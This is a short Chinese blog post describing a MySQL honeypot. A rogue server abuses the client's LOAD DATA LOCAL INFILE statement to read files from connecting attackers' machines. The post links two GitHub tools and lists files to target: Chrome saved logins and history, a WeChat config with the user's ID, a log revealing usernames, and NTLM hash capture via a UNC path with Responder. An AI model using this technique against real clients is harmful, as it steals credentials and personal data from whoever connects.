[2021]MySQL蜜罐,读取攻击者任意文件 huoji MYSQL,蜜罐,mysql蜜罐 2021-04-11 1154 次浏览 1 次点赞 mysql客户端load data语句这块没有受到限制,服务端发什么信息就会读什么,而且没有校验,特别蠢 原理 > MySQL中 load data local infile '/etc/passwd' into table test fields terminated by '\n';语句可以读取客户端本地文件并插进表中,那么我们可以伪造一个恶意的服务器,向连接服务器的客户端发送读取文件的payload。这个技术并不新鲜,但是合理利用就能起到一些不错的成果。 脚本: https://github.com/ev0A/Mysqlist https://github.com/qigpig/MysqlHoneypot ```c chrome的login data,虽然无法解密出密码,但是还是可以获取到对方的一些账号的 'C:/Users/' + username + '/AppData/Local/Google/Chrome/User Data/Default/Login Data' chrome的历史记录 'C:/Users/' + username + '/AppData/Local/Google/Chrome/User Data/Default/History' 用户的NTLM Hash(Bettercap + responder) \\ip\test C:\Users\username\Documents\WeChat Files\All Users\config\config.data中含有微信ID C:\Windows\PFRO.log中较大几率能找到用户名 ``` 本文由 huoji 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。 点赞 1
还不快抢沙发